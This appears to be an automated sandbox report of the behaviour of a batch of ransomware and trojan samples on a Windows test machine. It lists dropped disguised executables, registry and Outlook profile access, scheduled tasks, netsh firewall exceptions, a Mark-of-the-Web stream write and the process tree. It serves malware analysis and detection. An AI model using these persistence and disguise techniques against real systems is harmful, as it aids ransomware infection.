| File created | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\AppIcon.targetsize-40_contrast-black.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Licenses16\MondoVL_KMS_Client-ppd.xrm-ms.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\24.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\SmallTile.scale-100.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\EXCEL_COL.HXT | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\osclientcerts.dll | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallTile.scale-125_contrast-black.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\Background_RoomTracing_02.jpg | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-256.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\LargeTile.scale-125.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.targetsize-20_altform-unplated.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\VBEUIRES.DLL | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-white\WideTile.scale-200.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\174.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeTile.scale-100_contrast-white.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-30_altform-lightunplated.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ppd.xrm-ms.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-40_altform-unplated_contrast-white.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MedTile.scale-125_contrast-white.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\1850_24x24x32.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCS\offlineUtilities.js | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\CardUIBkg.scale-100.png | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\dt_shmem.dll | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019DemoR_BypassTrial180-ul-oob.xrm-ms.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\de\UIAutomationTypes.resources.dll | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\dictation\SpeechOn.wav | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\SpotlightCalendar_2017-03.gif.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Generic-Dark.scale-125.png.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\w2k_lsa_auth.dll | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-ul-oob.xrm-ms.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\chromet.exe | C:\Windows\chromet.exe | N/A |
| File created | C:\Windows\chromet.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exe | N/A |
| File opened for modification | C:\Windows\chromet.exe | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exe | N/A |
| File opened for modification | C:\Windows\assembly | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe | N/A |
| File created | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe | N/A |
| File opened for modification | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe | N/A |
Subvert Trust Controls: Mark-of-the-Web Bypass
Note: the row below is the same Zone.Identifier write that appears under NTFS ADS further down. Creating or rewriting that stream on the dropped Google.exe is how the Mark-of-the-Web is set or cleared, which is what this label refers to; the report does not show the stream's contents.
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\GoogleUpdate\Google.exe:Zone.Identifier | C:\Windows\SysWOW64\cmd.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Note: the rows below show netsh.exe enumerating HKLM\SOFTWARE\Microsoft\NetSh, which it does on every start to load its registered helper DLLs; here that is a side effect of the netsh firewall add allowedprogram commands listed in the Processes section. No write to that key is recorded, so the report does not show a helper DLL being registered. To rule it out on a live host, compare the key's values against the stock helper list.
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\tmp1E0F.tmp.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\GoogleUpdate\Google.exe:Zone.Identifier | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exe | N/A |
| N/A | N/A | C:\ProgramData\DLL32.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe | N/A |
| N/A | N/A | C:\Windows\chromet.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exe | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-9597b79088c3cd0398338e4cdbcc3c1f07a9eab820ca6443a58877ccec4db0cb.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-9597b79088c3cd0398338e4cdbcc3c1f07a9eab820ca6443a58877ccec4db0cb.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00462.7z
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00462.7z"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /1
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Blocker.gen-7d1a6a371aed5661b7f62da5e040396dda8a17733174e25f6b211ffef5810245.exe
HEUR-Trojan-Ransom.Win32.Blocker.gen-7d1a6a371aed5661b7f62da5e040396dda8a17733174e25f6b211ffef5810245.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exe
HEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe
HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe
HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exe
HEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exe
C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
"C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe
HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe
C:\Users\Admin\AppData\Local\Temp\onefile_3144_133728903411204673\main.exe
HEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-08c273af2b38f8c03028bc1e8f383d784712ff84b7b9c9e421ce1c9213d2e557.exe
HEUR-Trojan.MSIL.Crypt.gen-08c273af2b38f8c03028bc1e8f383d784712ff84b7b9c9e421ce1c9213d2e557.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe
HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe
HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-49b033d90c561256dbe38618a71c2b61d3872c0e0029ab30fc3f5a509105770f.exe
HEUR-Trojan.MSIL.Crypt.gen-49b033d90c561256dbe38618a71c2b61d3872c0e0029ab30fc3f5a509105770f.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-6cf6715578124129e279c73bcb6d9aaf380aaa71776b07deb242c65e069bb349.exe
HEUR-Trojan.MSIL.Crypt.gen-6cf6715578124129e279c73bcb6d9aaf380aaa71776b07deb242c65e069bb349.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-779da79cc7425f8b7264e175a58ad72e0a1ab0534840a438fc228c7baee809d1.exe
HEUR-Trojan.MSIL.Crypt.gen-779da79cc7425f8b7264e175a58ad72e0a1ab0534840a438fc228c7baee809d1.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exe
HEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exe
HEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe
HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c11b258979d24a7c988d540cb3551c58a3addbbdb85c2307aee72eae8c5c3770.exe
HEUR-Trojan.MSIL.Crypt.gen-c11b258979d24a7c988d540cb3551c58a3addbbdb85c2307aee72eae8c5c3770.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exe
HEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exe
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe
